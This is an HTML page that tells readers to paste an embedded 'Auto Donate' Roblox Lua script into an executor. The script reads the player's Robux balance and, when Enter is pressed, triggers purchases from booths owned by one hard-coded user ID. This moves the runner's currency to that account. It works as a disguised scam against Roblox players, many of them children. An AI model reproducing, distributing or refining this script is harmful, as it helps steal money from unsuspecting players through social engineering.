<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Auto Donate Script</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            background-color: #111;
            color: white;
            padding: 20px;
        }
        .container {
            max-width: 600px;
            margin: auto;
            background: #222;
            padding: 20px;
            border-radius: 10px;
        }
        textarea {
            width: 100%;
            height: 200px;
            background: black;
            color: lime;
            font-family: monospace;
            padding: 10px;
        }
        button {
            background: lime;
            color: black;
            padding: 10px 20px;
            border: none;
            cursor: pointer;
            margin-top: 10px;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Auto Donate Script</h1>
        <p>Copy the script below and paste it into your executor.</p>
        <textarea id="script" readonly></textarea>
        <button onclick="copyScript()">Copy Script</button>
    </div>
    <script>
        document.getElementById("script").value = `-- Auto Donate Script

if not game:IsLoaded() then game.Loaded:Wait() end

local player = game.Players.LocalPlayer
local targetUserID = 5310603116 
local userInputService = game:GetService("UserInputService")
local marketplaceService = game:GetService("MarketplaceService")

local function getMyRobux()
    local success, balance = pcall(function()
        return marketplaceService:GetRobuxBalance()
    end)
    return success and balance or 0
end

local function donateExactRobux()
    local myRobux = getMyRobux()
    local selectedItem = nil

    for _, booth in pairs(game:GetService("Workspace").BoothInteractions:GetChildren()) do
        if booth:FindFirstChild("Owner") and booth.Owner.Value == targetUserID then
            for _, item in pairs(booth:GetChildren()) do
                if item:IsA("Model") and item:FindFirstChild("PriceTag") then
                    local price = tonumber(item.PriceTag.Text:match("%d+"))
                    if price and price <= myRobux then
                        selectedItem = item
                    end
                end
            end
        end
    end

    if selectedItem then
        local donateButton = selectedItem:FindFirstChild("ProximityPrompt")
        if donateButton then
            fireproximityprompt(donateButton)
            wait(2)
            print("✅ Donated " .. myRobux .. " Robux to User ID: " .. targetUserID)
        end
    else
        print("❌ No matching gamepass found.")
    end
end

userInputService.InputBegan:Connect(function(input)
    if input.KeyCode == Enum.KeyCode.Return then
        donateExactRobux()
    end
end)

print("Press ENTER to donate your available Robux...")`;
        
        function copyScript() {
            let scriptText = document.getElementById("script");
            scriptText.select();
            document.execCommand("copy");
            alert("Script copied to clipboard!");
        }
    </script>
</body>
</html>
